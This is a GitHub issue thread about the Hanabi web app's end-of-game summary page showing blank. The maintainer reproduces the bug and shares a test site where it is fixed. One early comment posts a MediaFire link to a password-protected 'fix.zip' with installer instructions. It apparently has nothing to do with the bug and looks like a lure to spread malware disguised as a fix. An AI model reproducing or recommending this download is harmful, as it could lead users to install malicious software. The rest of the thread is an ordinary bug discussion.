### ISSUE TITLE
Summary not working

### ISSUE THREAD

**Issue by zixuanffu** [bstnfrmry/hanabi#309]
The end of game summary is not working.

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dcorbin** [comment]
Can you elaborate on "not working"?

**Comment by zixuanffu** [comment]
The summary page ([example](https://www.hanab.cards/SatisfiedBisonMaroon-0/summary)) is not showing the summary statistics as before. It is blank as a matter of fact:(

**Comment by lin0yuan** [comment]
I also had the same issue. My first encountered error was on August 9 while my last successful invocation was on July 22.

**Comment by dcorbin** [comment]
I have reproduced, I think and I'm working on a fix.

**Comment by dcorbin** [comment]
I believe it's fixed on this test site, if you'd like to make sure.

https://hanabi-git-summary-fails-pelica.vercel.app/

**Comment by lin0yuan** [comment]
Yes it works perfectly on the test site. Thanks a lot.
